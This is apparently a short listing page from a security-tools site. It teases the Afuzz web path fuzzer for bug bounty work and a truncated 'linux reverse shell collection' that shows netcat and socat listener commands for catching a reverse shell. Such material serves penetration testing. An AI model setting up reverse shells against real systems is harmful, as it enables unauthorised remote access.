Since the website’s launch, there has not been any documentation or tutorials. As its functionality is relatively simple, little introduction is necessary. However, there are some small details and scenarios that I think would be helpful to share.
Category: Tools
security tools
Afuzz – An automated web path fuzzing tool
Afuzz is an automated web path fuzzing tool for the Bug Bounty projects. Afuzz is being […]
linux reverse shell collection
listen port nc -lvnp 4444 nc -vvlp 4444 socat version socat TCP-LISTEN:12345 – socat reverse […]